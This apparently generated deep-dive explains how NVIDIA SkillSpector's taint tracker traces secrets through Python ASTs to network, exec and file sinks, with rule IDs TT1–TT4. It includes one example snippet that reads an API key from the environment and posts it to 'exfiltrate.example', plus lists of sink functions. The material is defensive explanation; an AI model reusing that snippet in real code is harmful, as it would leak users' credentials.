# How Taint Tracking Detects Data Exfiltration Paths in SkillSpector

> SkillSpector's taint tracking analyzes Python ASTs to find data exfiltration paths. It identifies flows from sensitive data to dangerous sinks, flagging explicit and implicit paths with rule IDs.

- Repository: [NVIDIA Corporation/SkillSpector](https://github.com/NVIDIA/SkillSpector)
- Tags: deep-dive
- Published: 2026-07-09

---

**SkillSpector's behavioral taint-tracking analyzer parses Python ASTs to identify flows from sensitive data sources to dangerous sinks, flagging explicit and implicit exfiltration paths with rule IDs like TT1, TT2, and TT3.**

Taint tracking is a static analysis technique that traces how data flows from trusted origins to untrusted destinations. In the NVIDIA SkillSpector repository, this approach is implemented in [`src/skillspector/nodes/analyzers/behavioral_taint_tracking.py`](https://github.com/NVIDIA/SkillSpector/blob/main/src/skillspector/nodes/analyzers/behavioral_taint_tracking.py) to detect when sensitive values—such as API keys or environment variables—are leaked through network calls, file writes, or subprocess executions.

## Core Mechanics of Taint Tracking

The analyzer operates by treating sensitive data acquisition points as **sources** and potential leak points as **sinks**, then computing whether a path exists between them in the abstract syntax tree (AST).

### Defining Sources and Sinks

The analyzer enumerates specific Python functions and methods that introduce secrets or read sensitive data. According to the source code, these are categorized into four groups:

- **`_CREDENTIAL_SOURCES`** – Functions like `os.getenv` or `os.environ.get` that retrieve environment variables
- **`_FILE_READ_SOURCES`** – File read operations that might contain secrets
- **`_NETWORK_INPUT_SOURCES`** – Network receive operations
- **`_USER_INPUT_SOURCES`** – User input functions

For sinks, the analyzer defines three high-risk categories between lines 91-123:

- **`_NETWORK_OUTPUT_SINKS`** – Network transmission calls like `requests.post` or `urllib.request.urlopen`
- **`_EXEC_SINKS`** – Code execution vectors such as `subprocess.run` or `os.system`
- **`_FILE_WRITE_SINKS`** – File persistence operations that could exfiltrate data

### Propagating Taint Through the AST

When the analyzer processes a file via `_analyze_python` (which uses `ast.parse` to build the tree), it executes a multi-phase propagation strategy:

1. **Taint Introduction**: The `_find_source_in_expr` function identifies when a source function is called. When found, `_mark_targets` tags the assigned variables as *tainted*, recording the original source line and type.

2. **Taint Spread**: The `_find_tainted_in_expr` and `_find_tainted_names_in_args` utilities propagate marks through reassignments, dictionary literals, f-strings, and function arguments. If a tainted variable flows into a new variable or container, that new entity inherits the taint status.

3. **Sink Matching**: The analyzer iterates over `ast.Call` nodes, resolves the fully-qualified call name using helper utilities from [`common.py`](https://github.com/NVIDIA/SkillSpector/blob/main/common.py), and checks if any argument contains tainted data.

### Detecting Source-to-Sink Flows

When the analyzer identifies a call to a sink function containing tainted data, it emits a finding via the `_emit` method. The `_pick_rule` logic distinguishes between flow types:

- **TT3/TT4**: Direct flows where a source is passed immediately to a sink (higher severity)
- **TT1/TT2**: Indirect flows where tainted data passes through intermediate variables before reaching a sink

Each `AnalyzerFinding` object includes the rule ID, severity, file location, confidence level, and a "Data Flow" tag for UI categorization.

## Why Taint Analysis Catches Hidden Exfiltration Paths

Unlike simple regex patterns that match literal strings, taint tracking provides **semantic data-flow reasoning**. Consider this evasive pattern that regex might miss:

```python
import os
import requests

secret = os.getenv("API_KEY")
payload = {"auth": secret}
encoded = json.dumps(payload)
requests.post("https://exfiltrate.example", data=encoded)

```

The analyzer marks `secret` as tainted at line 4 (source: `os.getenv`), propagates the taint through the `payload` dictionary and `encoded` string, and reports a finding when `requests.post` (a network sink) is called. This captures the **implicit flow** through data transformations.

The approach also provides **cross-module awareness**. Because the analysis aggregates taint information per-file, it can detect when a secret is read in one module and exported in another—a common pattern in multi-file skill projects.

Finally, the granularity of rule selection reduces false positives. By distinguishing between direct credential exposure (TT3) and indirect flows through intermediates (TT1/TT2), security reviewers can prioritize the most dangerous exfiltration paths.

## Running the Taint Tracking Node

You can invoke the analyzer programmatically against a skill codebase:

```python
from skillspector.state import SkillspectorState
from skillspector.nodes.analyzers.behavioral_taint_tracking import node

# Initialize state with file contents

state = SkillspectorState(
    components=["skill.py"],
    file_cache={"skill.py": open("skill.py").read()},
)

response = node(state)
for finding in response["findings"]:
    print(f"{finding.location.file}:{finding.location.start_line} "
          f"{finding.message} ({finding.severity})")

```

The node integrates into SkillSpector's graph-based analysis framework alongside complementary checks in [`static_patterns_data_exfiltration.py`](https://github.com/NVIDIA/SkillSpector/blob/main/static_patterns_data_exfiltration.py), providing defense-in-depth against data exfiltration.

## Summary

- **SkillSpector** implements taint tracking in [`behavioral_taint_tracking.py`](https://github.com/NVIDIA/SkillSpector/blob/main/behavioral_taint_tracking.py) by parsing Python ASTs to trace data from sources to sinks.
- **Sources** include environment variables, file reads, and user input; **sinks** include network calls, subprocess execution, and file writes.
- **Taint propagation** flows through assignments, containers, and function arguments, enabling detection of implicit exfiltration paths.
- **Rule IDs** TT1-TT4 categorize findings by severity, with direct source-to-sink flows (TT3) ranked as most critical.
- The analyzer complements regex-based patterns in [`static_patterns_data_exfiltration.py`](https://github.com/NVIDIA/SkillSpector/blob/main/static_patterns_data_exfiltration.py) by adding semantic understanding of data flow.

## Frequently Asked Questions

### What types of sources and sinks does SkillSpector recognize?

The analyzer recognizes four source categories (`_CREDENTIAL_SOURCES`, `_FILE_READ_SOURCES`, `_NETWORK_INPUT_SOURCES`, `_USER_INPUT_SOURCES`) and three sink categories (`_NETWORK_OUTPUT_SINKS`, `_EXEC_SINKS`, `_FILE_WRITE_SINKS`). These cover common Python patterns like `os.getenv`, `requests.post`, `subprocess.run`, and file I/O operations, allowing the tool to detect when sensitive data moves from storage or input mechanisms to external destinations.

### How does taint tracking differ from static pattern matching in SkillSpector?

Static pattern detection in [`static_patterns_data_exfiltration.py`](https://github.com/NVIDIA/SkillSpector/blob/main/static_patterns_data_exfiltration.py) uses regular expressions to flag suspicious syntax, such as hardcoded URLs or specific API calls. Taint tracking, implemented in [`behavioral_taint_tracking.py`](https://github.com/NVIDIA/SkillSpector/blob/main/behavioral_taint_tracking.py), performs **semantic analysis** by building an AST and computing data flows. This enables detection of exfiltration through variable assignments, data transformations, and multi-step flows that regex patterns cannot express.

### Can the analyzer detect exfiltration across multiple Python files?

Yes. While the AST parsing occurs per-file via `ast.parse`, the analyzer aggregates taint information across the entire component set provided in the `SkillspectorState`. This allows it to track when a secret is read in one module (source) and later passed to a network call in another module (sink), which is essential for analyzing multi-file skill projects.

### What do the rule IDs TT1, TT2, TT3, and TT4 indicate?

These rule IDs categorize the nature of the tainted flow. **TT3** and **TT4** indicate **direct** flows where sensitive data moves immediately from a source to a sink, warranting high severity. **TT1** and **TT2** indicate **indirect** flows where data passes through intermediate variables or transformations before reaching a sink, typically assigned lower severity but still flagged for review.